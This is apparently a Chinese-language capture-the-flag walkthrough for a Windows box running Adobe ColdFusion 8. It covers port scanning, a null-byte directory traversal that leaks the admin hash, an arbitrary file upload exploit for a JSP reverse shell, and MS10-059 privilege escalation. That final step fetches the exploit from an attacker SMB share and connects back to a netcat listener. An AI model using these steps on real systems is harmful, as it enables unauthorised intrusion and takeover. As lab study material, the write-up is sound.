简单难度
端口扫描
135/tcp open msrpc 8500/tcp open fmtp 49154/tcp open unknown
进入cfide,浏览./CFIDE/
显示了adobe的应用程序(专门用于创建动态网页以及网络应用程序和设计的开发工具)。再进去到adminstrator,发现了一个名为Adobe Cold Fusion 版本 8的中央管理系统 (CMS)
searchsploit Cold Fusion ,这边我利用了文件上传和rce都不行,利用目录遍历的可以
%00en
.可能该网站正在确保locale
以合理的字符串结尾,,然后得到admin的hash值
登入来到后台
coldfusion8后台计划任务拿shell_coldfusion shell-优快云博客这是它百度找到提权的文章
文件上传我没成功但是具体的操作是
searchsploit -m 50057.py
这里的脚本有 LHOST、LPORT、RHOST 和 RPORT,需要对其进行编辑。它还表明它制作了一个 java (JSP) 有效负载并使用 post 请求将其上传到网络服务器。在其上方,它显示了“执行有效负载”和“侦听器连接”的定义,以定义脚本导航到执行有效负载的位置,并使用 netcat 捕获 shell。
执行
python3 ./50057.py
这是直接利用meter的
ColdFusion 8.0.1 Arbitrary File Upload and Execute
成功获得第一个flag
提权:
systeminfo
和上台一样是Windows 2008 R2 服务器没打补丁且土豆提权的前提有 可以利用试试(这边先不用)
试试用工具
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
python -m pip install xlrd
root@kali# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
将(sysinfo的信息复制到文件里)
python2.7 windows-exploit-suggester.py --database 2023-12-04-mssb.xls -i system.txt
可能工具太老了,用不了
用一下MS10-059
windows-kernel-exploits/MS10-059: Chimichurri at master · egre55/windows-kernel-exploits · GitHub
本地smbserver.py share .
靶机net use \\10.10.14.47\share
copy \\10.10.14.47\share\Chimichurri.exe .
\Chimichurri.exe 10.10.14.47 443
kali监听rlwrap nc -nvlp 443